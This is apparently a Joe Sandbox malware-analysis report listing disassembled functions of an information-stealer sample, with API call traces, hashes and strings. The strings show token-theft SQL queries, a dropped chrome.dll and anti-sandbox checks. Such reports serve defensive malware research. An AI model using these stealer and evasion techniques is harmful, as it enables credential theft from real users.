                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                              • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                                                                                                                              • StrCmpCA.SHLWAPI(?,009A2060), ref: 00406197
                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                                                                                                                              • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                                                                                                                              • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4287319946-0
                                                                                                                                              • Opcode ID: 28317a5f4b32b5285a3637a607846846f53c0ba5e8d8391b34f33a6405c08cc5
                                                                                                                                              • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                                                                                                                              • Opcode Fuzzy Hash: 28317a5f4b32b5285a3637a607846846f53c0ba5e8d8391b34f33a6405c08cc5
                                                                                                                                              • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                                                                                                                              Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                                                                                                                              • memset.MSVCRT ref: 004173EA
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                                                                                                                              Strings
                                                                                                                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                              • API String ID: 224852652-4138519520
                                                                                                                                              • Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                                                                                                                              • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                                                                                                                              • Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                                                                                                                              • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                                                                                                                              Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                                                                                                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                                                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                              • API String ID: 1440504306-1079375795
                                                                                                                                              • Opcode ID: 26e5f42c56a9bd45e8368c4bd83fe13a8bee554072fb4c077e30b6b4f405d8ac
                                                                                                                                              • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                                                                                                                              • Opcode Fuzzy Hash: 26e5f42c56a9bd45e8368c4bd83fe13a8bee554072fb4c077e30b6b4f405d8ac
                                                                                                                                              • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                                                                                                                              Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                                                                                                                • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,00999400), ref: 00410922
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,00999430), ref: 00410B79
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,009993D0), ref: 00410A0C
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                                                                                                                              Strings
                                                                                                                                              • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                                                                                                                              • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                                                                                                                              • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                                                                                                                              • API String ID: 585553867-663540502
                                                                                                                                              • Opcode ID: fd08354940e9a9743f2d265c6b3001cb3ad82b03ee52f6f1a879f50892eaf52e
                                                                                                                                              • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                                                                                                                              • Opcode Fuzzy Hash: fd08354940e9a9743f2d265c6b3001cb3ad82b03ee52f6f1a879f50892eaf52e
                                                                                                                                              • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                                                                                                                              Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0600,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                                                                                                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                                                                                                                              • lstrcatA.KERNEL32(?,0099BF58), ref: 00414A97
                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0E88), ref: 00414ABF
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                                                                • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                                                                                                                • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                                                                                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                                                                                                                                • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 167551676-0
                                                                                                                                              • Opcode ID: ca37e48eac6c41bf83888b042920387d67c8233dae85e760b5f4e7268f4a1e27
                                                                                                                                              • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                                                                                                                              • Opcode Fuzzy Hash: ca37e48eac6c41bf83888b042920387d67c8233dae85e760b5f4e7268f4a1e27
                                                                                                                                              • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                                                                                                                              Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00992738), ref: 00419BF1
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00992750), ref: 00419C0A
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00992A20), ref: 00419C22
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00992A38), ref: 00419C3A
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009929A8), ref: 00419C53
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00999720), ref: 00419C6B
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00995DB8), ref: 00419C83
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00995F98), ref: 00419C9C
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009929C0), ref: 00419CB4
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00992A50), ref: 00419CCC
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009929F0), ref: 00419CE5
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00992A08), ref: 00419CFD
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00995E18), ref: 00419D15
                                                                                                                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009929D8), ref: 00419D2E
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                                                                                • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                                                                                                                • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                                                                                • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                                                                                                                • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                                                                                                                • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                                                                                • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                                                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                                                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                                                                                • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                                                                                • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                                                                                                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                                                                                • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                                • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                                • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                                • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                                • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                                • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009996C0,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 00416DA4
                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,009996C0,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00416DC2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3511611419-0
                                                                                                                                              • Opcode ID: 8a03359fbb02c655c0548d3d52d224c83fd8e00b0531176fab20e457766eebbc
                                                                                                                                              • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                                                                                                                              • Opcode Fuzzy Hash: 8a03359fbb02c655c0548d3d52d224c83fd8e00b0531176fab20e457766eebbc
                                                                                                                                              • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E
                                                                                                                                              Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                                                              • wsprintfA.USER32 ref: 004185E9
                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,009A05E8,00000000,000F003F,?,00000400), ref: 0041867C
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00418691
                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,009A05B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00418798
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
